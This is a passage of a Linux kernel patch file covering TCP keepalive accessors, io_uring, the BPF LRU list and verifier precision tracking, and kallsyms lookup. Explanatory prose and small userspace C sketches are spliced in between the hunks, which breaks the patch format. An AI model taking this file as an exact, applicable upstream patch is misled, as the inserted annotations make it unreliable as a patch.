+-		READ_ONCE(net->ipv4.sysctl_tcp_keepalive_time);
++	/* Paired with WRITE_ONCE() in tcp_sock_set_keepidle_locked() */
++	val = READ_ONCE(tp->keepalive_time);
++
++	return val ? : READ_ONCE(net->ipv4.sysctl_tcp_keepalive_time);
+ }
+ 
+ static inline int keepalive_probes(const struct tcp_sock *tp)
+ {
+ 	struct net *net = sock_net((struct sock *)tp);
++	int val;
+ 
+-	return tp->keepalive_probes ? :
+-		READ_ONCE(net->ipv4.sysctl_tcp_keepalive_probes);
++	/* Paired with WRITE_ONCE() in tcp_sock_set_keepcnt()
++	 * and do_tcp_setsockopt().
++	 */
++	val = READ_ONCE(tp->keepalive_probes);
++
++	return val ? : READ_ONCE(net->ipv4.sysctl_tcp_keepalive_probes);
+ }
+ 
+ static inline u32 keepalive_time_elapsed(const struct tcp_sock *tp)
+@@ -2046,7 +2059,11 @@ void __tcp_v4_send_check(struct sk_buff *skb, __be32 saddr, __be32 daddr);
+ static inline u32 tcp_notsent_lowat(const struct tcp_sock *tp)
+ {
+ 	struct net *net = sock_net((struct sock *)tp);
+-	return tp->notsent_lowat ?: READ_ONCE(net->ipv4.sysctl_tcp_notsent_lowat);
++	u32 val;
++
++	val = READ_ONCE(tp->notsent_lowat);
++
++	return val ?: READ_ONCE(net->ipv4.sysctl_tcp_notsent_lowat);
+ }
+ 
+ bool tcp_stream_memory_free(const struct sock *sk, int wake);
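Both tcp hunks above (fastopenq.max_qlen and the keepalive/notsent_lowat accessors) apply the same lockless pattern: the writer publishes with WRITE_ONCE() and readers take one READ_ONCE() snapshot that is then tested and used, so a racing setsockopt() can neither tear the value nor be observed twice with different results. A compilable userspace sketch of the accessor shape; the sysctl fallback is a stand-in constant:

    #include <stdio.h>

    #define READ_ONCE(x)     (*(const volatile __typeof__(x) *)&(x))
    #define WRITE_ONCE(x, v) (*(volatile __typeof__(x) *)&(x) = (v))

    static int keepalive_intvl;           /* tunable, written concurrently */
    static const int sysctl_default = 75;

    static int keepalive_intvl_when(void)
    {
        int val = READ_ONCE(keepalive_intvl);  /* exactly one load */

        return val ? : sysctl_default;         /* reuse the snapshot */
    }

    int main(void)
    {
        WRITE_ONCE(keepalive_intvl, 30);
        printf("%d\n", keepalive_intvl_when());
        return 0;
    }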
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index 38bc0073a7d43..bd7b8cf8bc677 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -1803,6 +1803,14 @@ fail:
+ 		ret = io_issue_sqe(req, issue_flags);
+ 		if (ret != -EAGAIN)
+ 			break;
++
++		/*
++		 * If REQ_F_NOWAIT is set, then don't wait or retry with
++		 * poll. -EAGAIN is final for that case.
++		 */
++		if (req->flags & REQ_F_NOWAIT)
++			break;
++
+ 		/*
+ 		 * We can get EAGAIN for iopolled IO even though we're
+ 		 * forcing a sync submission from here, since we can't
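The io_uring hunk makes -EAGAIN final for REQ_F_NOWAIT requests rather than retrying or falling back to poll. A small generic model of that retry policy; the flag name and issue() behavior are made up:

    #include <errno.h>
    #include <stdio.h>

    #define FLAG_NOWAIT 0x1

    static int issue(int attempt)
    {
        return attempt < 2 ? -EAGAIN : 0;  /* succeeds on the third try */
    }

    static int submit(unsigned int flags)
    {
        int ret;

        for (int attempt = 0; ; attempt++) {
            ret = issue(attempt);
            if (ret != -EAGAIN)
                break;
            if (flags & FLAG_NOWAIT)
                break;                     /* -EAGAIN is final here */
        }
        return ret;
    }

    int main(void)
    {
        /* blocking path retries to success; nowait returns -EAGAIN (-11) */
        printf("blocking: %d, nowait: %d\n", submit(0), submit(FLAG_NOWAIT));
        return 0;
    }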
+diff --git a/kernel/bpf/bpf_lru_list.c b/kernel/bpf/bpf_lru_list.c
+index d99e89f113c43..3dabdd137d102 100644
+--- a/kernel/bpf/bpf_lru_list.c
++++ b/kernel/bpf/bpf_lru_list.c
+@@ -41,7 +41,12 @@ static struct list_head *local_pending_list(struct bpf_lru_locallist *loc_l)
+ /* bpf_lru_node helpers */
+ static bool bpf_lru_node_is_ref(const struct bpf_lru_node *node)
+ {
+-	return node->ref;
++	return READ_ONCE(node->ref);
++}
++
++static void bpf_lru_node_clear_ref(struct bpf_lru_node *node)
++{
++	WRITE_ONCE(node->ref, 0);
+ }
+ 
+ static void bpf_lru_list_count_inc(struct bpf_lru_list *l,
+@@ -89,7 +94,7 @@ static void __bpf_lru_node_move_in(struct bpf_lru_list *l,
+ 
+ 	bpf_lru_list_count_inc(l, tgt_type);
+ 	node->type = tgt_type;
+-	node->ref = 0;
++	bpf_lru_node_clear_ref(node);
+ 	list_move(&node->list, &l->lists[tgt_type]);
+ }
+ 
+@@ -110,7 +115,7 @@ static void __bpf_lru_node_move(struct bpf_lru_list *l,
+ 		bpf_lru_list_count_inc(l, tgt_type);
+ 		node->type = tgt_type;
+ 	}
+-	node->ref = 0;
++	bpf_lru_node_clear_ref(node);
+ 
+ 	/* If the moving node is the next_inactive_rotation candidate,
+ 	 * move the next_inactive_rotation pointer also.
+@@ -353,7 +358,7 @@ static void __local_list_add_pending(struct bpf_lru *lru,
+ 	*(u32 *)((void *)node + lru->hash_offset) = hash;
+ 	node->cpu = cpu;
+ 	node->type = BPF_LRU_LOCAL_LIST_T_PENDING;
+-	node->ref = 0;
++	bpf_lru_node_clear_ref(node);
+ 	list_add(&node->list, local_pending_list(loc_l));
+ }
+ 
+@@ -419,7 +424,7 @@ static struct bpf_lru_node *bpf_percpu_lru_pop_free(struct bpf_lru *lru,
+ 	if (!list_empty(free_list)) {
+ 		node = list_first_entry(free_list, struct bpf_lru_node, list);
+ 		*(u32 *)((void *)node + lru->hash_offset) = hash;
+-		node->ref = 0;
++		bpf_lru_node_clear_ref(node);
+ 		__bpf_lru_node_move(l, node, BPF_LRU_LIST_T_INACTIVE);
+ 	}
+ 
+@@ -522,7 +527,7 @@ static void bpf_common_lru_push_free(struct bpf_lru *lru,
+ 		}
+ 
+ 		node->type = BPF_LRU_LOCAL_LIST_T_FREE;
+-		node->ref = 0;
++		bpf_lru_node_clear_ref(node);
+ 		list_move(&node->list, local_free_list(loc_l));
+ 
+ 		raw_spin_unlock_irqrestore(&loc_l->lock, flags);
+@@ -568,7 +573,7 @@ static void bpf_common_lru_populate(struct bpf_lru *lru, void *buf,
+ 
+ 		node = (struct bpf_lru_node *)(buf + node_offset);
+ 		node->type = BPF_LRU_LIST_T_FREE;
+-		node->ref = 0;
++		bpf_lru_node_clear_ref(node);
+ 		list_add(&node->list, &l->lists[BPF_LRU_LIST_T_FREE]);
+ 		buf += elem_size;
+ 	}
+@@ -594,7 +599,7 @@ again:
+ 		node = (struct bpf_lru_node *)(buf + node_offset);
+ 		node->cpu = cpu;
+ 		node->type = BPF_LRU_LIST_T_FREE;
+-		node->ref = 0;
++		bpf_lru_node_clear_ref(node);
+ 		list_add(&node->list, &l->lists[BPF_LRU_LIST_T_FREE]);
+ 		i++;
+ 		buf += elem_size;
+diff --git a/kernel/bpf/bpf_lru_list.h b/kernel/bpf/bpf_lru_list.h
+index 4ea227c9c1ade..8f3c8b2b4490e 100644
+--- a/kernel/bpf/bpf_lru_list.h
++++ b/kernel/bpf/bpf_lru_list.h
+@@ -64,11 +64,8 @@ struct bpf_lru {
+ 
+ static inline void bpf_lru_node_set_ref(struct bpf_lru_node *node)
+ {
+-	/* ref is an approximation on access frequency.  It does not
+-	 * have to be very accurate.  Hence, no protection is used.
+-	 */
+-	if (!node->ref)
+-		node->ref = 1;
++	if (!READ_ONCE(node->ref))
++		WRITE_ONCE(node->ref, 1);
+ }
+ 
+ int bpf_lru_init(struct bpf_lru *lru, bool percpu, u32 hash_offset,
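The accessors above keep the ref bit's approximate-hint semantics but annotate the racy loads and stores (quieting KCSAN) and retain the test-before-store so a hot, shared cache line isn't dirtied when the bit is already set. A userspace rendering of the same accessors:

    #include <stdio.h>

    #define READ_ONCE(x)     (*(const volatile __typeof__(x) *)&(x))
    #define WRITE_ONCE(x, v) (*(volatile __typeof__(x) *)&(x) = (v))

    struct node { int ref; };

    static void node_set_ref(struct node *n)
    {
        if (!READ_ONCE(n->ref))    /* skip the store if already set */
            WRITE_ONCE(n->ref, 1);
    }

    static void node_clear_ref(struct node *n)
    {
        WRITE_ONCE(n->ref, 0);
    }

    int main(void)
    {
        struct node n = { 0 };

        node_set_ref(&n);
        node_set_ref(&n);          /* second call avoids a redundant store */
        node_clear_ref(&n);
        printf("%d\n", n.ref);
        return 0;
    }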
+diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c
+index 8633ec4f92df3..0c44a716f0a24 100644
+--- a/kernel/bpf/syscall.c
++++ b/kernel/bpf/syscall.c
+@@ -5289,7 +5289,8 @@ static int bpf_unpriv_handler(struct ctl_table *table, int write,
+ 		*(int *)table->data = unpriv_enable;
+ 	}
+ 
+-	unpriv_ebpf_notify(unpriv_enable);
++	if (write)
++		unpriv_ebpf_notify(unpriv_enable);
+ 
+ 	return ret;
+ }
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 8c3ededef3172..3c414e0ac819e 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -511,6 +511,15 @@ static bool is_dynptr_ref_function(enum bpf_func_id func_id)
+ 	return func_id == BPF_FUNC_dynptr_data;
+ }
+ 
++static bool is_callback_calling_function(enum bpf_func_id func_id)
++{
++	return func_id == BPF_FUNC_for_each_map_elem ||
++	       func_id == BPF_FUNC_timer_set_callback ||
++	       func_id == BPF_FUNC_find_vma ||
++	       func_id == BPF_FUNC_loop ||
++	       func_id == BPF_FUNC_user_ringbuf_drain;
++}
++
+ static bool helper_multiple_ref_obj_use(enum bpf_func_id func_id,
+ 					const struct bpf_map *map)
+ {
+@@ -1693,7 +1702,7 @@ static void __mark_reg_unknown(const struct bpf_verifier_env *env,
+ 	reg->type = SCALAR_VALUE;
+ 	reg->var_off = tnum_unknown;
+ 	reg->frameno = 0;
+-	reg->precise = env->subprog_cnt > 1 || !env->bpf_capable;
++	reg->precise = !env->bpf_capable;
+ 	__mark_reg_unbounded(reg);
+ }
+ 
+@@ -2670,6 +2679,11 @@ static int backtrack_insn(struct bpf_verifier_env *env, int idx,
+ 			 */
+ 			if (insn->src_reg == BPF_PSEUDO_KFUNC_CALL && insn->imm == 0)
+ 				return -ENOTSUPP;
++			/* BPF helpers that invoke callback subprogs are
++			 * equivalent to BPF_PSEUDO_CALL above
++			 */
++			if (insn->src_reg == 0 && is_callback_calling_function(insn->imm))
++				return -ENOTSUPP;
+ 			/* regular helper call sets R0 */
+ 			*reg_mask &= ~1;
+ 			if (*reg_mask & 0x3f) {
+@@ -2774,8 +2788,11 @@ static void mark_all_scalars_precise(struct bpf_verifier_env *env,
+ 
+ 	/* big hammer: mark all scalars precise in this path.
+ 	 * pop_stack may still get !precise scalars.
++	 * We also skip current state and go straight to first parent state,
++	 * because precision markings in current non-checkpointed state are
++	 * not needed. See why in the comment in __mark_chain_precision below.
+ 	 */
+-	for (; st; st = st->parent)
++	for (st = st->parent; st; st = st->parent) {
+ 		for (i = 0; i <= st->curframe; i++) {
+ 			func = st->frame[i];
+ 			for (j = 0; j < BPF_REG_FP; j++) {
+@@ -2793,8 +2810,121 @@ static void mark_all_scalars_precise(struct bpf_verifier_env *env,
+ 				reg->precise = true;
+ 			}
+ 		}
++	}
++}
++
++static void mark_all_scalars_imprecise(struct bpf_verifier_env *env, struct bpf_verifier_state *st)
++{
++	struct bpf_func_state *func;
++	struct bpf_reg_state *reg;
++	int i, j;
++
++	for (i = 0; i <= st->curframe; i++) {
++		func = st->frame[i];
++		for (j = 0; j < BPF_REG_FP; j++) {
++			reg = &func->regs[j];
++			if (reg->type != SCALAR_VALUE)
++				continue;
++			reg->precise = false;
++		}
++		for (j = 0; j < func->allocated_stack / BPF_REG_SIZE; j++) {
++			if (!is_spilled_reg(&func->stack[j]))
++				continue;
++			reg = &func->stack[j].spilled_ptr;
++			if (reg->type != SCALAR_VALUE)
++				continue;
++			reg->precise = false;
++		}
++	}
+ }
+ 
++/*
++ * __mark_chain_precision() backtracks BPF program instruction sequence and
++ * chain of verifier states making sure that register *regno* (if regno >= 0)
++ * and/or stack slot *spi* (if spi >= 0) are marked as precisely tracked
++ * SCALARS, as well as any other registers and slots that contribute to
++ * a tracked state of given registers/stack slots, depending on specific BPF
++ * assembly instructions (see backtrack_insn() for exact instruction handling
++ * logic). This backtracking relies on recorded jmp_history and is able to
++ * traverse entire chain of parent states. This process ends only when all the
++ * necessary registers/slots and their transitive dependencies are marked as
++ * precise.
++ *
++ * One important and subtle aspect is that precise marks *do not matter* in
++ * the currently verified state (current state). It is important to understand
++ * why this is the case.
++ *
++ * First, note that current state is the state that is not yet "checkpointed",
++ * i.e., it is not yet put into env->explored_states, and it has no child
++ * states yet. It's ephemeral, and can end up either a) being discarded if
++ * compatible explored state is found at some point or BPF_EXIT instruction is
++ * reached or b) checkpointed and put into env->explored_states, branching out
++ * into one or more children states.
++ *
++ * In the former case, precise markings in current state are completely
++ * ignored by state comparison code (see regsafe() for details). Only
++ * checkpointed ("old") state precise markings are important, and if old
++ * state's register/slot is precise, regsafe() assumes current state's
++ * register/slot as precise and checks value ranges exactly and precisely. If
++ * states turn out to be compatible, current state's necessary precise
++ * markings and any required parent states' precise markings are enforced
++ * after the fact with propagate_precision() logic. But it's
++ * important to realize that in this case, even after marking current state
++ * registers/slots as precise, we immediately discard current state. So what
++ * actually matters is any of the precise markings propagated into current
++ * state's parent states, which are always checkpointed (due to b) case above).
++ * As such, for scenario a) it doesn't matter if current state has precise
++ * markings set or not.
++ *
++ * Now, for the scenario b), checkpointing and forking into child(ren)
++ * state(s). Note that before current state gets to checkpointing step, any
++ * processed instruction always assumes precise SCALAR register/slot
++ * knowledge: if precise value or range is useful to prune jump branch, BPF
++ * verifier takes this opportunity enthusiastically. Similarly, when
++ * a register's value is used to calculate an offset or memory address, exact
++ * knowledge of SCALAR range is assumed, checked, and enforced. So, similar to
++ * what we mentioned above about state comparison ignoring precise markings
++ * during state comparison, BPF verifier ignores and also assumes precise
++ * markings *at will* during instruction verification process. But as verifier
++ * assumes precision, it also propagates any precision dependencies across
++ * parent states, which are not yet finalized, so can be further restricted
++ * based on new knowledge gained from restrictions enforced by their children
++ * states. This is so that once those parent states are finalized, i.e., when
++ * they have no more active child states, state comparison logic in
++ * is_state_visited() would enforce strict and precise SCALAR ranges, if
++ * required for correctness.
++ *
++ * To build a bit more intuition, note also that once a state is checkpointed,
++ * the path we took to get to that state is not important. This is a crucial
++ * property for state pruning. When a state is checkpointed and finalized at
++ * some instruction index, it can be correctly and safely used to "short
++ * circuit" any *compatible* state that reaches exactly the same instruction
++ * index. I.e., if we jumped to that instruction from a completely different
++ * code path than original finalized state was derived from, it doesn't
++ * matter, current state can be discarded because from that instruction
++ * forward having a compatible state will ensure we will safely reach the
++ * exit. States describe preconditions for further exploration, but completely
++ * forget the history of how we got here.
++ *
++ * This also means that even if we needed precise SCALAR range to get to
++ * finalized state, but from that point forward *that same* SCALAR register is
++ * never used in a precise context (i.e., its precise value is not needed for
++ * correctness), it's correct and safe to mark such register as "imprecise"
++ * (i.e., precise marking set to false). This is what we rely on when we do
++ * not set precise marking in current state. If no child state requires
++ * precision for any given SCALAR register, it's safe to dictate that it can
++ * be imprecise. If any child state does require this register to be precise,
++ * we'll mark it precise later retroactively during precise markings
++ * propagation from child state to parent states.
++ *
++ * Skipping precise marking setting in current state is a mild version of
++ * relying on the above observation. But we can utilize this property even
++ * more aggressively by proactively forgetting any precise marking in the
++ * current state (which we inherited from the parent state), right before we
++ * checkpoint it and branch off into new child state. This is done by
++ * mark_all_scalars_imprecise() to hopefully get more permissive and generic
++ * finalized states which help in short circuiting more future states.
++ */
+ static int __mark_chain_precision(struct bpf_verifier_env *env, int frame, int regno,
+ 				  int spi)
+ {
+@@ -2812,6 +2942,10 @@ static int __mark_chain_precision(struct bpf_verifier_env *env, int frame, int r
+ 	if (!env->bpf_capable)
+ 		return 0;
+ 
++	/* Do sanity checks against current state of register and/or stack
++	 * slot, but don't set precise flag in current state, as precision
++	 * tracking in the current state is unnecessary.
++	 */
+ 	func = st->frame[frame];
+ 	if (regno >= 0) {
+ 		reg = &func->regs[regno];
+@@ -2819,11 +2953,7 @@ static int __mark_chain_precision(struct bpf_verifier_env *env, int frame, int r
+ 			WARN_ONCE(1, "backtracing misuse");
+ 			return -EFAULT;
+ 		}
+-		if (!reg->precise)
+-			new_marks = true;
+-		else
+-			reg_mask = 0;
+-		reg->precise = true;
++		new_marks = true;
+ 	}
+ 
+ 	while (spi >= 0) {
+@@ -2836,11 +2966,7 @@ static int __mark_chain_precision(struct bpf_verifier_env *env, int frame, int r
+ 			stack_mask = 0;
+ 			break;
+ 		}
+-		if (!reg->precise)
+-			new_marks = true;
+-		else
+-			stack_mask = 0;
+-		reg->precise = true;
++		new_marks = true;
+ 		break;
+ 	}
+ 
+@@ -2848,12 +2974,42 @@ static int __mark_chain_precision(struct bpf_verifier_env *env, int frame, int r
+ 		return 0;
+ 	if (!reg_mask && !stack_mask)
+ 		return 0;
++
+ 	for (;;) {
+ 		DECLARE_BITMAP(mask, 64);
+ 		u32 history = st->jmp_history_cnt;
+ 
+ 		if (env->log.level & BPF_LOG_LEVEL2)
+ 			verbose(env, "last_idx %d first_idx %d\n", last_idx, first_idx);
++
++		if (last_idx < 0) {
++			/* we are at the entry into subprog, which
++			 * is expected for global funcs, but only if
++			 * requested precise registers are R1-R5
++			 * (which are global func's input arguments)
++			 */
++			if (st->curframe == 0 &&
++			    st->frame[0]->subprogno > 0 &&
++			    st->frame[0]->callsite == BPF_MAIN_FUNC &&
++			    stack_mask == 0 && (reg_mask & ~0x3e) == 0) {
++				bitmap_from_u64(mask, reg_mask);
++				for_each_set_bit(i, mask, 32) {
++					reg = &st->frame[0]->regs[i];
++					if (reg->type != SCALAR_VALUE) {
++						reg_mask &= ~(1u << i);
++						continue;
++					}
++					reg->precise = true;
++				}
++				return 0;
++			}
++
++			verbose(env, "BUG backtracing func entry subprog %d reg_mask %x stack_mask %llx\n",
++				st->frame[0]->subprogno, reg_mask, stack_mask);
++			WARN_ONCE(1, "verifier backtracking bug");
++			return -EFAULT;
++		}
++
+ 		for (i = last_idx;;) {
+ 			if (skip_first) {
+ 				err = 0;
+@@ -4288,16 +4444,17 @@ static int update_stack_depth(struct bpf_verifier_env *env,
+  * Since recursion is prevented by check_cfg() this algorithm
+  * only needs a local stack of MAX_CALL_FRAMES to remember callsites
+  */
+-static int check_max_stack_depth(struct bpf_verifier_env *env)
++static int check_max_stack_depth_subprog(struct bpf_verifier_env *env, int idx)
+ {
+-	int depth = 0, frame = 0, idx = 0, i = 0, subprog_end;
+ 	struct bpf_subprog_info *subprog = env->subprog_info;
+ 	struct bpf_insn *insn = env->prog->insnsi;
++	int depth = 0, frame = 0, i, subprog_end;
+ 	bool tail_call_reachable = false;
+ 	int ret_insn[MAX_CALL_FRAMES];
+ 	int ret_prog[MAX_CALL_FRAMES];
+ 	int j;
+ 
++	i = subprog[idx].start;
+ process_func:
+ 	/* protect against potential stack overflow that might happen when
+ 	 * bpf2bpf calls get combined with tailcalls. Limit the caller's stack
+@@ -4336,7 +4493,7 @@ process_func:
+ continue_func:
+ 	subprog_end = subprog[idx + 1].start;
+ 	for (; i < subprog_end; i++) {
+-		int next_insn;
++		int next_insn, sidx;
+ 
+ 		if (!bpf_pseudo_call(insn + i) && !bpf_pseudo_func(insn + i))
+ 			continue;
+@@ -4346,14 +4503,14 @@ continue_func:
+ 
+ 		/* find the callee */
+ 		next_insn = i + insn[i].imm + 1;
+-		idx = find_subprog(env, next_insn);
+-		if (idx < 0) {
++		sidx = find_subprog(env, next_insn);
++		if (sidx < 0) {
+ 			WARN_ONCE(1, "verifier bug. No program starts at insn %d\n",
+ 				  next_insn);
+ 			return -EFAULT;
+ 		}
+-		if (subprog[idx].is_async_cb) {
+-			if (subprog[idx].has_tail_call) {
++		if (subprog[sidx].is_async_cb) {
++			if (subprog[sidx].has_tail_call) {
+ 				verbose(env, "verifier bug. subprog has tail_call and async cb\n");
+ 				return -EFAULT;
+ 			}
+@@ -4362,6 +4519,7 @@ continue_func:
+ 				continue;
+ 		}
+ 		i = next_insn;
++		idx = sidx;
+ 
+ 		if (subprog[idx].has_tail_call)
+ 			tail_call_reachable = true;
+@@ -4397,6 +4555,22 @@ continue_func:
+ 	goto continue_func;
+ }
+ 
++static int check_max_stack_depth(struct bpf_verifier_env *env)
++{
++	struct bpf_subprog_info *si = env->subprog_info;
++	int ret;
++
++	for (int i = 0; i < env->subprog_cnt; i++) {
++		if (!i || si[i].is_async_cb) {
++			ret = check_max_stack_depth_subprog(env, i);
++			if (ret < 0)
++				return ret;
++		}
++		continue;
++	}
++	return 0;
++}
++
+ #ifndef CONFIG_BPF_JIT_ALWAYS_ON
+ static int get_callee_stack_depth(struct bpf_verifier_env *env,
+ 				  const struct bpf_insn *insn, int idx)
+@@ -6714,6 +6888,10 @@ typedef int (*set_callee_state_fn)(struct bpf_verifier_env *env,
+ 				   struct bpf_func_state *callee,
+ 				   int insn_idx);
+ 
++static int set_callee_state(struct bpf_verifier_env *env,
++			    struct bpf_func_state *caller,
++			    struct bpf_func_state *callee, int insn_idx);
++
+ static int __check_func_call(struct bpf_verifier_env *env, struct bpf_insn *insn,
+ 			     int *insn_idx, int subprog,
+ 			     set_callee_state_fn set_callee_state_cb)
+@@ -6764,6 +6942,16 @@ static int __check_func_call(struct bpf_verifier_env *env, struct bpf_insn *insn
+ 		}
+ 	}
+ 
++	/* set_callee_state is used for direct subprog calls, but we are
++	 * interested in validating only BPF helpers that can call subprogs as
++	 * callbacks
++	 */
++	if (set_callee_state_cb != set_callee_state && !is_callback_calling_function(insn->imm)) {
++		verbose(env, "verifier bug: helper %s#%d is not marked as callback-calling\n",
++			func_id_name(insn->imm), insn->imm);
++		return -EFAULT;
++	}
++
+ 	if (insn->code == (BPF_JMP | BPF_CALL) &&
+ 	    insn->src_reg == 0 &&
+ 	    insn->imm == BPF_FUNC_timer_set_callback) {
+@@ -11592,7 +11780,7 @@ static bool regsafe(struct bpf_verifier_env *env, struct bpf_reg_state *rold,
+ 		if (env->explore_alu_limits)
+ 			return false;
+ 		if (rcur->type == SCALAR_VALUE) {
+-			if (!rold->precise && !rcur->precise)
++			if (!rold->precise)
+ 				return true;
+ 			/* new val must satisfy old val knowledge */
+ 			return range_within(rold, rcur) &&
+@@ -12141,6 +12329,10 @@ next:
+ 	env->prev_jmps_processed = env->jmps_processed;
+ 	env->prev_insn_processed = env->insn_processed;
+ 
++	/* forget precise markings we inherited, see __mark_chain_precision */
++	if (env->bpf_capable)
++		mark_all_scalars_imprecise(env, cur);
++
+ 	/* add new state to the head of linked list */
+ 	new = &new_sl->state;
+ 	err = copy_verifier_state(new, cur);
+@@ -14695,6 +14887,8 @@ static int do_check_common(struct bpf_verifier_env *env, int subprog)
+ 			BPF_MAIN_FUNC /* callsite */,
+ 			0 /* frameno */,
+ 			subprog);
++	state->first_insn_idx = env->subprog_info[subprog].start;
++	state->last_insn_idx = -1;
+ 
+ 	regs = state->frame[state->curframe]->regs;
+ 	if (subprog || env->prog->type == BPF_PROG_TYPE_EXT) {
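check_max_stack_depth() above becomes a thin loop that re-runs the explicit-stack walk once per entry point: the main program plus every async callback, since an async callback runs on its own stack. A self-contained toy version of the iterative walk, tracking the deepest combined frame size over an invented call graph:

    #include <stdio.h>

    #define NPROGS     5
    #define MAX_FRAMES 8

    static const int stack_size[NPROGS] = { 64, 128, 32, 256, 16 };
    /* calls[i] lists the subprogs called by i, terminated by -1 */
    static const int calls[NPROGS][3] = {
        { 1, 3, -1 }, { 2, -1, -1 }, { -1, -1, -1 },
        { 4, -1, -1 }, { -1, -1, -1 }
    };

    static int max_depth_from(int entry)
    {
        int stack_idx[MAX_FRAMES], stack_pos[MAX_FRAMES];
        int top = 0, depth = stack_size[entry], max = 0;

        stack_idx[0] = entry;
        stack_pos[0] = 0;

        while (top >= 0) {
            int i = stack_idx[top];
            int c = calls[i][stack_pos[top]++];

            if (max < depth)
                max = depth;
            if (c < 0) {             /* no more callees: pop the frame */
                depth -= stack_size[i];
                top--;
                continue;
            }
            stack_idx[++top] = c;    /* push the callee's frame */
            stack_pos[top] = 0;
            depth += stack_size[c];
        }
        return max;
    }

    int main(void)
    {
        /* a real checker would repeat this for each async entry point */
        printf("max depth from 0: %d\n", max_depth_from(0)); /* 336 */
        return 0;
    }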
+diff --git a/kernel/cgroup/cgroup.c b/kernel/cgroup/cgroup.c
+index 2380c4daef33d..73f11e4db3a4d 100644
+--- a/kernel/cgroup/cgroup.c
++++ b/kernel/cgroup/cgroup.c
+@@ -3771,7 +3771,7 @@ static ssize_t pressure_write(struct kernfs_open_file *of, char *buf,
+ 	}
+ 
+ 	psi = cgroup_psi(cgrp);
+-	new = psi_trigger_create(psi, buf, res);
++	new = psi_trigger_create(psi, buf, res, of->file, of);
+ 	if (IS_ERR(new)) {
+ 		cgroup_put(cgrp);
+ 		return PTR_ERR(new);
+diff --git a/kernel/kallsyms.c b/kernel/kallsyms.c
+index 60c20f301a6ba..676328a7c8c75 100644
+--- a/kernel/kallsyms.c
++++ b/kernel/kallsyms.c
+@@ -174,11 +174,10 @@ static bool cleanup_symbol_name(char *s)
+ 	 * LLVM appends various suffixes for local functions and variables that
+ 	 * must be promoted to global scope as part of LTO.  This can break
+ 	 * hooking of static functions with kprobes. '.' is not a valid
+-	 * character in an identifier in C. Suffixes observed:
++	 * character in an identifier in C. Suffixes observed only with LLVM LTO:
+ 	 * - foo.llvm.[0-9a-f]+
+-	 * - foo.[0-9a-f]+
+ 	 */
+-	res = strchr(s, '.');
++	res = strstr(s, ".llvm.");
+ 	if (res) {
+ 		*res = '\0';
+ 		return true;
+@@ -187,26 +186,90 @@ static bool cleanup_symbol_name(char *s)
+ 	return false;
+ }
+ 
++static int compare_symbol_name(const char *name, char *namebuf)
++{
++	int ret;
++
++	ret = strcmp(name, namebuf);
++	if (!ret)
++		return ret;
++
++	if (cleanup_symbol_name(namebuf) && !strcmp(name, namebuf))
++		return 0;
++
++	return ret;
++}
++
++static int kallsyms_lookup_names(const char *name,
++				 unsigned int *start,
++				 unsigned int *end)
++{
++	int ret;
++	int low, mid, high;
++	unsigned int seq, off;
++	char namebuf[KSYM_NAME_LEN];
++
++	low = 0;
++	high = kallsyms_num_syms - 1;
++
++	while (low <= high) {
++		mid = low + (high - low) / 2;
++		seq = kallsyms_seqs_of_names[mid];
++		off = get_symbol_offset(seq);
++		kallsyms_expand_symbol(off, namebuf, ARRAY_SIZE(namebuf));
++		ret = compare_symbol_name(name, namebuf);
++		if (ret > 0)
++			low = mid + 1;
++		else if (ret < 0)
++			high = mid - 1;
++		else
++			break;
++	}
++
++	if (low > high)
++		return -ESRCH;
++
++	low = mid;
++	while (low) {
++		seq = kallsyms_seqs_of_names[low - 1];
++		off = get_symbol_offset(seq);
++		kallsyms_expand_symbol(off, namebuf, ARRAY_SIZE(namebuf));
++		if (compare_symbol_name(name, namebuf))
++			break;
++		low--;
++	}
++	*start = low;
++
++	if (end) {
++		high = mid;
++		while (high < kallsyms_num_syms - 1) {
++			seq = kallsyms_seqs_of_names[high + 1];
++			off = get_symbol_offset(seq);
++			kallsyms_expand_symbol(off, namebuf, ARRAY_SIZE(namebuf));
++			if (compare_symbol_name(name, namebuf))
++				break;
++			high++;
++		}
++		*end = high;
++	}
++
++	return 0;
++}
++
+ /* Lookup the address for this symbol. Returns 0 if not found. */
+ unsigned long kallsyms_lookup_name(const char *name)
+ {
+-	char namebuf[KSYM_NAME_LEN];
+-	unsigned long i;
+-	unsigned int off;
++	int ret;
++	unsigned int i;
+ 
+ 	/* Skip the search for empty string. */
+ 	if (!*name)
+ 		return 0;
+ 
+-	for (i = 0, off = 0; i < kallsyms_num_syms; i++) {
+-		off = kallsyms_expand_symbol(off, namebuf, ARRAY_SIZE(namebuf));
+-
+-		if (strcmp(namebuf, name) == 0)
+-			return kallsyms_sym_address(i);
++	ret = kallsyms_lookup_names(name, &i, NULL);
++	if (!ret)
++		return kallsyms_sym_address(kallsyms_seqs_of_names[i]);
+ 
+-		if (cleanup_symbol_name(namebuf) && strcmp(namebuf, name) == 0)
+-			return kallsyms_sym_address(i);
+-	}
+ 	return module_kallsyms_lookup_name(name);
+ }
+ 
+diff --git a/kernel/kallsyms_internal.h b/kernel/kallsyms_internal.h
+index 2d0c6f2f0243a..a04b7a5cb1e3e 100644
+--- a/kernel/kallsyms_internal.h
++++ b/kernel/kallsyms_internal.h
+@@ -26,5 +26,6 @@ extern const char kallsyms_token_table[] __weak;
+ extern const u16 kallsyms_token_index[] __weak;
+ 
+ extern const unsigned int kallsyms_markers[] __weak;
++extern const unsigned int kallsyms_seqs_of_names[] __weak;
+ 
+ #endif // LINUX_KALLSYMS_INTERNAL_H_
+diff --git a/kernel/rcu/tasks.h b/kernel/rcu/tasks.h
+index df968321feada..c1f18c63b9b14 100644
+--- a/kernel/rcu/tasks.h
++++ b/kernel/rcu/tasks.h
+@@ -233,7 +233,6 @@ static void cblist_init_generic(struct rcu_tasks *rtp)
+ 	if (rcu_task_enqueue_lim < 0) {
+ 		rcu_task_enqueue_lim = 1;
+ 		rcu_task_cb_adjust = true;
+-		pr_info("%s: Setting adjustable number of callback queues.\n", __func__);
+ 	} else if (rcu_task_enqueue_lim == 0) {
+ 		rcu_task_enqueue_lim = 1;
+ 	}
+@@ -264,6 +263,10 @@ static void cblist_init_generic(struct rcu_tasks *rtp)
+ 		raw_spin_unlock_rcu_node(rtpcp); // irqs remain disabled.
+ 	}
